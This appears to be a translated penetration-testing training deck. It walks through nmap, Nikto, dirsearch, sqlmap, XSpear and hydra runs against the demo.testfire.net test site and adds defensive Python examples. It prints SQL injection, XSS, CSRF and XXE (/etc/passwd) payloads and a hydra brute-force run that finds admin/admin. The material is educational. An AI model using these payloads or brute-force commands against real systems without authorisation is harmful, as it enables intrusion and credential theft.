VulnScan_PenTest.pdf
2. Vulnerability Scan (Vuln Scan)
Overview:
Check whether the managed hosts, servers or network devices have possible vulnerabilities, and confirm the state of each port on the machine and the services behind it
Characteristics:
Automated, identifies known vulnerabilities, low cost, fast, high test frequency
3. Penetration Test (Pen Test)
Overview:
Attacks carried out at the application layer or the network layer against specific functions, to find unknown security flaws in normal business flows
Characteristics:
Manual work + tools, discovers and exploits vulnerabilities, high cost, slow, low test frequency
5. Testing process
Step 1: Scope – network segments, services, external network, internal network, ...
Step 2: Schedule
Step 3: Tools and methods –
(Tools) Nmap, OpenVAS, OWASP ZAP, ...
(Methods) port scanning, DDoS, social engineering, password brute-forcing, ...
Step 4: Carry out the test
Step 5: Remediation
Step 6: Re-test
Testing processes differ from engagement to engagement; read the contract between both parties carefully before testing
7. nmap
SYN Scan : nmap -sS [IP] -p [PORT]
Connect Scan (full TCP handshake) : nmap -sT [IP] -p [PORT]
UDP Scan : nmap -sU [IP] -p [PORT]
-T [NUM] : timing template (0-5, higher is faster and noisier)
-p : ports
more: man nmap
8. nmap -sS 65.61.137.117 -p-
Starting Nmap 7.80SVN ( https://nmap.org ) at 2020-0X-0X 22:19 CST
Nmap scan report for 65.61.137.117
Host is up (0.18s latency).
Not shown: 65531 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 1474.81 seconds
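Added example (not from the original slides): a small parser that turns plain-text nmap output such as the report above into the set of open ports and compares it with an approved baseline, so a scheduled scan can flag services that should not be exposed. The sample output, the approved-port baseline and the function names are constructed for this example.

```python
"""Parse nmap's human-readable report and diff it against a baseline.
Added example; the sample output and the APPROVED baseline are constructed."""
import re

# Constructed sample in the same shape as the nmap report on the slide.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.80SVN ( https://nmap.org ) at 2020-0X-0X 22:19 CST
Nmap scan report for 65.61.137.117
Host is up (0.18s latency).
Not shown: 65531 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
443/tcp  open  https
8080/tcp open  http-proxy
Nmap done: 1 IP address (1 host up) scanned in 1474.81 seconds
"""

# Matches report lines such as "8080/tcp open http-proxy".
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)", re.MULTILINE)


def parse_open_ports(nmap_text):
    """Return {(port, proto): service} for every port nmap reports as open."""
    result = {}
    for port, proto, state, service in PORT_LINE.findall(nmap_text):
        if state == "open":
            result[(int(port), proto)] = service
    return result


def unexpected_ports(open_ports, baseline):
    """Open ports that are not in the approved baseline, sorted for stable output."""
    return sorted(p for p in open_ports if p not in baseline)


# Hypothetical baseline: only the public web ports are approved for this host.
APPROVED = {(80, "tcp"), (443, "tcp")}

if __name__ == "__main__":
    found = parse_open_ports(SAMPLE_NMAP_OUTPUT)
    for port, proto in unexpected_ports(found, APPROVED):
        print(f"unexpected open port {port}/{proto} ({found[(port, proto)]})")
```

Running the block reports 8080/tcp (http-proxy) as the one port outside the baseline; in practice the baseline comes from the system inventory and the scan text from nmap's saved output.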
12. Nikto -host 65.61.137.117
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 65.61.137.117
+ Target Hostname: demo.testfire.net
+ Target Port: 80
+ Start Time: 2020-04-14 22:34:52 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 19 error(s) and 3 item(s) reported on remote host
+ End Time: 2020-04-14 22:36:50 (GMT8) (118 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
15. Hands-on - OpenVAS
Ubuntu 16.04 : https://resdoss.blogspot.com/2018/04/openvas9ubuntu16kioptrix-level-1.html
Ubuntu 18.04 : https://kifarunix.com/how-to-install-and-setup-openvas-9-vulnerability-scanner-on-ubuntu-18-04/
Kali Linux : http://yearlin101.blogspot.com/2017/08/kali-linux-openvas.html
16. A tester driven by curiosity
Little z learned that 65.61.137.117 has ports 80 and 443 open, so he tried connecting to the site and indeed found a domain, demo.testfire.net. Little z now wants to start a penetration test of this site. Where should he begin?
22. Information gathering – browser extensions
Wappalyzer: sends a request to the given URL and extracts information from the response headers
Chrome: https://chrome.google.com/webstore/detail/wappalyzer/gppongmhjkpfnbhagpmjfkannfbllamg?hl=zh-TW
Firefox: https://addons.mozilla.org/zh-TW/firefox/addon/wappalyzer/
24. Information gathering – Chrome extensions
EditThisCookie: each domain has its own cookies, which are stored on the client side; this extension makes it easy for the user to view and modify them
Chrome: https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg?hl=zh-TW
Firefox (Cookie Editor): https://addons.mozilla.org/zh-TW/firefox/addon/edit-cookie/
26. Cookie attributes
HostOnly: whether the cookie is used only for the specified host
Session: the cookie is treated as a session cookie (no expiry; discarded when the browser session ends)
Secure: whether the cookie is sent only over https, or also over plain http
HTTP Only: whether the cookie can be accessed from JavaScript
SameSite: whether the cookie is sent depends on whether the current site matches the target site
28. python3 dirsearch.py -u https://demo.testfire.net/ -e * -r -x 403
……
[23:36:21] 302 - 0B - /images -> /images/
[23:36:22] 200 - 9KB - /index.jsp
[23:36:29] 200 - 8KB - /login.jsp
[23:36:47] 302 - 0B - /pr -> /pr/
……
32. SQL injection (sqli)
SELECT * FROM users WHERE name = '$USER' and passwd='$PASSWD' ;
SELECT * FROM users WHERE name = '' or 1=1--' and passwd='a' ;
$USER = ' or 1=1--    $PASSWD = a
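Added example (not from the original slides): the concatenated query from the slide beside a parameterised version, both run against an in-memory SQLite table so the difference can be observed directly. The users table, its single row and the function names are constructed for this example.

```python
"""Vulnerable string-built query vs. bound parameters, on SQLite.
Added example; the users table and its contents are constructed."""
import sqlite3


def make_db():
    """Constructed table with one user so the queries have something to match."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, passwd TEXT)")
    conn.execute("INSERT INTO users VALUES ('zeze', 'secret')")
    return conn


def vulnerable_login(conn, user, passwd):
    """String concatenation, as on the slide: the input becomes part of the SQL text.
    With user = "' or 1=1--" the WHERE clause collapses to name = '' or 1=1 and the
    rest of the statement is commented out."""
    sql = f"SELECT * FROM users WHERE name = '{user}' and passwd='{passwd}'"
    return conn.execute(sql).fetchone() is not None


def safe_login(conn, user, passwd):
    """Bound parameters: the driver passes the values separately, never as SQL,
    so the same input is compared literally against the name column."""
    sql = "SELECT * FROM users WHERE name = ? and passwd = ?"
    return conn.execute(sql, (user, passwd)).fetchone() is not None


if __name__ == "__main__":
    conn = make_db()
    payload = "' or 1=1--"  # the $USER value from the slide
    print("vulnerable:", vulnerable_login(conn, payload, "a"))  # True: login bypassed
    print("safe:      ", safe_login(conn, payload, "a"))        # False
    print("safe, real:", safe_login(conn, "zeze", "secret"))    # True
```

The parameterised version is the fix the slide implies: the payload is still accepted as input, it just no longer changes the query's structure.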
33. Testing tool - sqlmap
sqlmap
sudo apt install sqlmap
https://github.com/sqlmapproject/sqlmap
-u [URL]
--data=[POST DATA]
--level [NUM]
--risk [NUM]
more: sqlmap -h
34. sqlmap -u https://65.61.137.117/doLogin --data="uid=a&passw=b" --level=3 --risk=3 --drop-set-cookie
Parameter: uid (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: uid=-6055' OR 6504=6504-- HAZj&passw=bb&btnSubmit=Login
37. XSpear -u "http://demo.testfire.net/search.jsp?query=a" -a
| NO | TYPE | ISSUE| METHOD | PARAM | PAYLOAD
……
| 7 | HIGH | XSS | GET | query | <audio src onloadstart=alert(45)>
| 8 | HIGH | XSS | GET | query | <marquee onstart=alert(45)>
| 9 | HIGH | XSS | GET | query | <video/poster/onerror=alert(45)>
……
38. Clickjacking
If site A does not set X-Frame-Options to DENY or SAMEORIGIN, another site B can embed site A in a frame.
Same-origin policy: in a web browser, a script from one page is allowed to access data of another page only if the two pages share the same URI scheme, host name and port number.
40. Cross Site Request Forgery (CSRF)
If a site's important cookies do not have SameSite configured properly, an attacker may be able to act under the user's identity.
SameSite:
No Restriction (None) – the most permissive; the cookie is attached to GET and POST requests sent from other domains
Lax – in between; the cookie is attached only on GET requests from other sites
Strict – the strictest; no cross-site request of any kind carries this cookie
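Added example (not from the original slides): an audit of one HTTP response for the cookie attributes (slide 26), the X-Frame-Options and X-Content-Type-Options headers that Nikto flagged, and the SameSite setting discussed under CSRF. The two responses below are constructed; in practice the header list would come from an actual response.

```python
"""Audit response headers and Set-Cookie attributes for the weaknesses
discussed on the slides. Added example; both sample responses are constructed."""


def parse_set_cookie(header_value):
    """Split 'name=value; Attr; Attr=val' into (name, value, {attr_lower: val_or_True})."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value, attrs


def audit_cookie(header_value):
    """Findings for one Set-Cookie header: Secure, HttpOnly and SameSite checks."""
    name, _, attrs = parse_set_cookie(header_value)
    findings = []
    if "secure" not in attrs:
        findings.append(f"{name}: missing Secure (may be sent over plain HTTP)")
    if "httponly" not in attrs:
        findings.append(f"{name}: missing HttpOnly (readable by JavaScript)")
    samesite = attrs.get("samesite")
    if samesite is None or str(samesite).lower() == "none":
        findings.append(f"{name}: SameSite unset or None (attached to cross-site requests)")
    return findings


def audit_response(headers):
    """headers: list of (name, value) pairs as received. Returns a list of findings."""
    findings = []
    names = {n.lower() for n, _ in headers}
    xfo = next((v for n, v in headers if n.lower() == "x-frame-options"), "").upper()
    if xfo not in ("DENY", "SAMEORIGIN"):
        findings.append("X-Frame-Options is not DENY or SAMEORIGIN (clickjacking)")
    if "x-content-type-options" not in names:
        findings.append("X-Content-Type-Options is not set")
    for n, v in headers:
        if n.lower() == "set-cookie":
            findings.extend(audit_cookie(v))
    return findings


# Constructed sample responses: one weak, one hardened.
WEAK = [("Server", "Apache-Coyote/1.1"),
        ("Set-Cookie", "JSESSIONID=abc123; Path=/")]
HARDENED = [("X-Frame-Options", "DENY"),
            ("X-Content-Type-Options", "nosniff"),
            ("Set-Cookie", "JSESSIONID=abc123; Path=/; Secure; HttpOnly; SameSite=Lax")]

if __name__ == "__main__":
    for finding in audit_response(WEAK):
        print("WEAK:", finding)
    print("hardened findings:", audit_response(HARDENED))
```

The weak response produces five findings (two headers, three cookie attributes); the hardened one produces none. SameSite=Lax is reported as acceptable here because the slide treats Lax and Strict as the restrictive settings; a site whose session cookie must never ride along on cross-site GETs would require Strict.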
41. Cross Site Request Forgery(CSRF)
ex.am/ple.php
Zeze info
user : zeze
password : ******
ha.ck/er.php
<a href="http://ex.am/ple.php?m=edit&user=zeze&pass=123456">Click!</a>
Click!
42. XML External Entity Injection(XXE)
<?xml version="1.0" encoding="utf-8"?>
<root>
<name>zeze</name>
</root>
ex.am/ple.php
Search
name: zeze
43. XML External Entity Injection(XXE)
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>
<name>&xxe</name>
</root>
ex.am/ple.php
Search
name: &xxe
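Added example (not from the original slides): the usual server-side mitigation for the XXE payload on slide 43, which is to refuse any document that declares a DTD before the XML parser ever sees it (the same rule defusedxml applies with forbid_dtd). The two documents mirror slides 42 and 43 and are constructed here; the handler and function names are assumptions.

```python
"""Reject DTD-bearing XML before parsing, then read the <name> element.
Added example; both sample documents are constructed to match the slides."""
import re
import xml.etree.ElementTree as ET

SAFE_DOC = '<?xml version="1.0" encoding="utf-8"?><root><name>zeze</name></root>'
XXE_DOC = ('<?xml version="1.0" encoding="utf-8"?>'
           '<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
           '<root><name>&xxe;</name></root>')

# A legitimate search request never needs a DOCTYPE or entity declaration,
# so the presence of either is treated as hostile input.
DTD_MARKER = re.compile(r"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def parse_name(xml_text):
    """Return the <name> text, refusing any document that declares a DTD."""
    if DTD_MARKER.search(xml_text):
        raise ValueError("DTD/entity declarations are not accepted")
    root = ET.fromstring(xml_text)
    node = root.find("name")
    return node.text if node is not None else None


def search_handler(xml_text):
    """What the ex.am/ple.php search endpoint would do: parse, or return an error."""
    try:
        return {"name": parse_name(xml_text)}
    except ValueError as exc:
        return {"error": str(exc)}


if __name__ == "__main__":
    print(search_handler(SAFE_DOC))   # {'name': 'zeze'}
    print(search_handler(XXE_DOC))    # {'error': 'DTD/entity declarations are not accepted'}
```

The check runs on the raw text, so it does not depend on how a particular parser treats external entities; the parser is only reached by documents that cannot reference one.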
44. OWASP Top 10
1. Injection
2. Broken Authentication
3. Sensitive Data Exposure
4. XML External Entities (XXE)
5. Broken Access Control
6. Security Misconfiguration
7. Cross-Site Scripting (XSS)
8. Insecure Deserialization
9. Using Components with Known Vulnerabilities
10. Insufficient Logging & Monitoring
https://owasp.org/www-project-top-ten/
45. Penetration testing tool - OWASP ZAP
Overview: OWASP Zed Attack Proxy (ZAP) is a web application vulnerability testing tool developed by the Open Web Application Security Project (OWASP). It has a simple, easy-to-use interface that lets web developers test whether the pages they build are secure.
https://owasp.org/www-project-zap/
47. Penetration testing – browser extensions
HackBar
Overview: provides payloads for various attack techniques, encode/decode and hash functions, and can also craft various requests
Chrome: https://chrome.google.com/webstore/detail/hackbar/ginpbkfigcoaokgflihfhhmglmbchinc
Firefox: https://addons.mozilla.org/zh-TW/firefox/addon/hackbar-quantum/
51. Brute-forcing account passwords - hydra
hydra install
Kali: built-in
Other Linux: https://github.com/vanhauser-thc/thc-hydra
Windows: https://github.com/maaaaz/thc-hydra-windows
53. hydra -L ./user.txt -P ./pass.txt demo.testfire.net http-post-form
"/doLogin:uid=^USER^&passw=^PASS^&btnSubmit=Login:F=Failed"
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-17 12:48:08
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:2/p:2), ~1 try per task
[DATA] attacking http-post-form://demo.testfire.net:80/doLogin:uid=^USER^&passw=^PASS^&btnSubmit=Login:F=Failed
[80][http-post-form] host: demo.testfire.net login: admin password: admin
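Added example (not from the original slides): detection logic for what the hydra run above looks like from the server side, namely a burst of POSTs to the login form from one client in a short window, run over constructed access-log lines. The log format (common log format), the window, the threshold and the function names are assumptions made for this example.

```python
"""Flag clients that POST to the login form repeatedly within a short window.
Added example; the log lines, window and threshold are constructed assumptions."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log. The first client sends four login POSTs in two seconds,
# which is the server-side shape of a credential-guessing run against /doLogin.
SAMPLE_LOG = """\
203.0.113.5 - - [17/Apr/2020:12:48:08 +0800] "POST /doLogin HTTP/1.1" 200 1532
203.0.113.5 - - [17/Apr/2020:12:48:08 +0800] "POST /doLogin HTTP/1.1" 200 1532
203.0.113.5 - - [17/Apr/2020:12:48:09 +0800] "POST /doLogin HTTP/1.1" 200 1532
203.0.113.5 - - [17/Apr/2020:12:48:09 +0800] "POST /doLogin HTTP/1.1" 302 0
198.51.100.7 - - [17/Apr/2020:12:50:01 +0800] "POST /doLogin HTTP/1.1" 302 0
198.51.100.7 - - [17/Apr/2020:12:51:30 +0800] "GET /index.jsp HTTP/1.1" 200 9000
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_log(text):
    """Return (ip, timestamp, method, path, status) tuples for each parseable line."""
    events = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
            events.append((m["ip"], ts, m["method"], m["path"], int(m["status"])))
    return events


def login_bursts(events, path="/doLogin", window=timedelta(seconds=60), threshold=3):
    """Return {ip: max_count} for clients with >= threshold POSTs to path inside one window.
    A sliding window over the sorted timestamps keeps this linear per client."""
    per_ip = defaultdict(list)
    for ip, ts, method, p, _status in events:
        if method == "POST" and p == path:
            per_ip[ip].append(ts)
    flagged = {}
    for ip, times in per_ip.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), count)
    return flagged


if __name__ == "__main__":
    for ip, count in login_bursts(parse_log(SAMPLE_LOG)).items():
        print(f"{ip}: {count} login POSTs within 60s")   # 203.0.113.5: 4
```

The threshold is deliberately low for the sample; a real deployment tunes window and threshold to the site's normal login rate and feeds the result into rate limiting or account lockout rather than just printing it.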